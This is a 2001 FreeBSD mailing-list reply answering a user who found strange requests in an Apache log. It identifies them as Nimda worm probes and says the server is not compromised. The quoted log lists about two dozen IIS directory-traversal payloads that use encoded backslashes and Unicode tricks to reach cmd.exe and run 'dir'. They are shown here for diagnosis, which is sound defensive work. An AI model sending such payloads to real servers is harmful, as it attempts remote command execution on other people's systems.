From owner-freebsd-questions Tue Nov 13 20: 1:51 2001 Delivered-To: freebsd-questions@freebsd.org Received: from chmls16.mediaone.net (chmls16.mediaone.net [24.147.1.151]) by hub.freebsd.org (Postfix) with ESMTP id 49D0B37B418 for ; Tue, 13 Nov 2001 20:01:44 -0800 (PST) Received: from keyslapper.org (acadia.ne.mediaone.net [65.96.186.69]) by chmls16.mediaone.net (8.11.1/8.11.1) with ESMTP id fAE41hT06540 for ; Tue, 13 Nov 2001 23:01:43 -0500 (EST) Received: (from leblanc@localhost) by keyslapper.org (8.11.6/8.11.6) id fAE430m26829; Tue, 13 Nov 2001 23:03:00 -0500 (EST) (envelope-from leblanc) Date: Tue, 13 Nov 2001 23:02:59 -0500 From: Louis LeBlanc To: freebsd-questions@FreeBSD.org, freebsd-questions@FreeBSD.org Subject: Re: Do these errors mean my system is comprimised? Message-ID: <20011114040259.GC25941@keyslapper.org> Reply-To: freebsd-questions@FreeBSD.org Mail-Followup-To: freebsd-questions@FreeBSD.org References: <0111131938440F.60958@chip.wiegand.org> <20011114040055.GB25941@keyslapper.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="hOcCNbCCxyk/YU74" Content-Disposition: inline In-Reply-To: <20011114040055.GB25941@keyslapper.org> User-Agent: Mutt/1.3.23.1i X-PGP-Fingerprint: 4EA2 24FF 41B0 0258 9A54 9309 7803 D662 B364 4562 X-bright-idea: Lets abolish HTML mail! Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --hOcCNbCCxyk/YU74 Content-Type: text/plain; charset=unknown-8bit Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On 11/13/01 11:00 PM, Louis LeBlanc sat at the `puter and typed: > On 11/13/01 07:38 PM, Chip sat at the `puter and typed: > > I found the following on my apache/freebsd/php/mysql server in my log a= fter=20 > > running analog - > > Looks like someone planted something that wants NT to work correctly - > > =20 > > 111: /scripts/..%255c../winnt/system32/cmd.exe > > 111: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir > > 106: /scripts/..%5c../winnt/system32/cmd.exe > > 106: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir > > 66: /scripts/root.exe > > 66: /scripts/root.exe?/c+dir > > 64: /MSADC/root.exe > > 64: /MSADC/root.exe?/c+dir > > 62: /c/winnt/system32/cmd.exe > > 62: /c/winnt/system32/cmd.exe?/c+dir > > 59: /d/winnt/system32/cmd.exe > > 59: /d/winnt/system32/cmd.exe?/c+dir > > 56: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe > > 56: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?= /c+dir > > 56:=20 > > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../win= nt/system32/cmd.exe > > 56: =20 > > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../win= nt/system32/cmd.exe?/c+dir > > 56: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe > > 56: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?= /c+dir > > 55: /scripts/..%c1%1c../winnt/system32/cmd.exe > > 55: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir > > 54: /scripts/winnt/system32/cmd.exe > > 54: /scripts/winnt/system32/cmd.exe?/c+dir > > 54: /scripts/..%c1%9c../winnt/system32/cmd.exe > > 54: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir > > 54: /scripts/..%c0%af../winnt/system32/cmd.exe > > 54: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir > > 51: /scripts/..%252f../winnt/system32/cmd.exe > > 51: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir >=20 >=20 > This is the footprint of the Nimda virus *trying* to infect your > system. You can find links to specific info on what Nimda tries to do > on Google, if you want to sort thru a million hits. You can also get > info on how an Apache installation can handle these (or not handle > them) at http://www.keyslapper.org/modules/ >=20 > Look for the Apache::Nimda page, even if you don't want to report it > to abuse and SecurityFocus, there are config ideas that will help you > reduce the impact on your log file size. >=20 > Also, look for the Apache::404 module. It will handle those misses and > notify you via email - once per period for each URL. It can help you > keep track of Nimda's impact on your server, and keep dead links tied > up. >=20 > Enough of the shameless plug. Check it out. >=20 Sorry, I forgot to answer your actual question. No, you've not been compromised. At least this is no indication. Nimda is strictly a MS gift to the world. Lou --=20 Louis LeBlanc leblanc@keyslapper.org Fully Funded Hobbyist, KeySlapper Extrordinaire :) http://www.keyslapper.org =D4=BF=D4=AC aphorism, n.: A concise, clever statement. afterism, n.: A concise, clever statement you don't think of until too late. -- James Alexander Thom --hOcCNbCCxyk/YU74 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE78ezzeAPWYrNkRWIRArjlAJwOs5GM2M9M8a31+wIrci5+gJ5/VACcDhPv Vudh37VCQlIIkInHMv1u8fQ= =WT7j -----END PGP SIGNATURE----- --hOcCNbCCxyk/YU74-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message